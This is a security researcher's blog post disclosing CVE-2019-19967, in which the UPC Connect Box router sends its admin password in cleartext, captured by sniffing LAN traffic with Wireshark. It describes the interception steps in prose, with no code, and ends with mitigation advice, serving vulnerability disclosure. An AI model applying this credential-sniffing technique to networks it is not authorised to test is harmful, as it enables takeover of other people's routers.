Router Exploiting

Filipi Pires
CoreShield
Published in
6 min readApr 4, 2020

Exploiting Connect Box EuroDOCSIS 3.0

Abstract

Nowadays, routers are an integral part of today’s home and small office networks. Usually, these kind of devices are implemented in many places with default configuration and are, typically, managed by people who do not have any special technical knowledge. Often poorly configured and vulnerable, such devices are an easy target for network-based attacks, allowing cyber-criminals to quickly and easily gain control over a network. I bet you heard the latest news about the “Infected 500,000 Devices That Could Cut Users Off From The Internet”. Over Half a Million Routers Infected by Destructive VPNFilter Malware. In this article we explain how to get admin credentials the in Connect Box DOCSIS 3.0 Voice Gateway router it was possible sniffing the HTTP traffic packets, within the same tested network, and perform some tests it is possible discover a vulnerability in the authentication process known as Cleartext Transmission of Sensitive Information. This router that has been tested is in Poland by the internet service provider UPC. This company provides services in many EU countries. This flaw it is register in through CVE — CVE-2019–19967 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19967) and according National Vulnerability Database-NVD this vulnerability has been signed by basescore : 7.5 high (https://nvd.nist.gov/vuln/detail/CVE-2019-19967).

Keywords: Router Exploitation, Security, CyberSecurity.

Connect Box — UPC Router

The Connect Box is the worldwide most compact EuroDOCSIS 3.0 Voice Gateway which provides the ideal all-in-one wired and wireless solution, designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.

Source: google images

The purpose of this exploration is to validate the security applied to the standard implementation of the router, as well as to guarantee the application of the main security models, whether in a home user or in a corporate environment.

We performed this proof of concept to get obtain the administrator credentials of the Connect Box DOCSIS 3.0 Voice Gateway router, it was possible to successfully perform, when sniffing the HTTP traffic packets, within the same tested network, when we perform some tests we discover a vulnerability in this router in the Authentication process known as Cleartext Transmission of Sensitive Information.

After discovering this flaw, we communicated the manufacturer about it, which put us in contact with the development team to assist in the improvement process, we also registered this failure through CVE — CVE-2019–19967 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19967)

This router that has been tested is in Poland by the internet service provider UPC. This company provides services in many EU countries.

Understanding Authentication Process

The first step in this kind of exploration is to understand how the application handles with the authentication process, as well as, the responses that are “printed” on the authentication page.

Figure 1: created by owner (2020)

When put this information in the application (tried “admin” access), we received the error return, as you can see in figure 1, but the text in the box, doesn’t in password for, after that, as you can see in the in figure 2, about the input form it is with type as “text”.

Figure 2: created by owner (2020)

In this case, a recommendation it is use in the input form to this authentication input type=password, as you can see in the figure 3. However, this would be just a visual protection, we still can’t know how the password treatment is done, when and how authentication is performed, for that we need to use some network sniffer to check how this request and return authentication works in the network communication.

Figure 3: created by owner (2020)

Looking Network Communication

I have been used the attacker machine with the IP Address: 192.168.0.45 to run the Wireshark and received all traffic the network, after that I’ve used victim machine — Victim 1–192.168.0.80

Figure 5: Victim Machine
created by owner (2020)
Figure 5: Attacker Machine
created by owner (2020)

Wireshark Analysis.

We tried to access with the password “admin”, however we receive the “login incorrect” information printed in the web page, so we went to see how Wireshark received this Authentication, my intention here, it was to discovery, what kind of encryption for authentication the application have used, but for my surprise, as you can see in the figure 6, the authentication not use none encrypt process the password is pass in the network in clear text, in this case we can to think about vulnerability known by MITRE as Cleartext Transmission of Sensitive Information (http://cwe.mitre.org/data/definitions/319.html)

Figure 6: created by owner (2020)

So now, we just need to receive a valid authentication, when you try to connect with your correct password, just be happy, because the Admin Authentication, it will be in ClearText, for anyone that is receiving network traffic in the same network.

Figure 7: created by owner (2020)

Another important poins is, If an attacker has access on this pcap file in other machine, as you can see in windows machine below (figure 8), when this attacker opens in the Wireshark and he starts to analyze this file, we can see the same behavior in authentication process in clear text without simple protection.

Figure 8: created by owner (2020)

Conclusion

As we can see in this article, a simple cryptographic flaw in the process of web page authentication, can greatly compromise the security of a home user when a company that use this router, this vulnerability it is known as the software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actor and it was signed as CVE-2019–19967 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19967)

You can configure a web application with some type of hidden, encoded, protection, or then some authentication with encryption, or based on some token, so there are many ways to increase the security level of your router.

So, I recommend reading some RFC — HTTP Hypertext Transfer Protocol, to understand the operation, as well as ways of protection.

Publications

References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19967 — Access at 16/01/2020
https://nvd.nist.gov/vuln/detail/CVE-2019-19967 — Access at 27/08/2020
https://github.com/filipi86/ConnectBoxDOCSIS-3.0 — Access at 16/01/2020
RFC 2660 — https://tools.ietf.org/html/rfc2660 — Access at 16/01/2020
RFC 7231 — https://tools.ietf.org/html/rfc7231 — Access at 16/01/2020
RFC 2818 — https://tools.ietf.org/html/rfc2818 — Access at 16/01/2020
RFC 2612 — https://tools.ietf.org/html/rfc2616 — Access at 16/01/2020
http://cwe.mitre.org/data/definitions/319.html — Acess at 27/01/2020
Official Document form UPC — https://www.upc.ch/pdf/support/manuals/en/internet/ConnectBox/connect-box-manual.pdf — Access at 16/01/2020

--

--

Filipi Pires
CoreShield

Security Researcher and CyberSecurity, Founder and Technical Trainer of the Course — Malware Analysis Fundamentals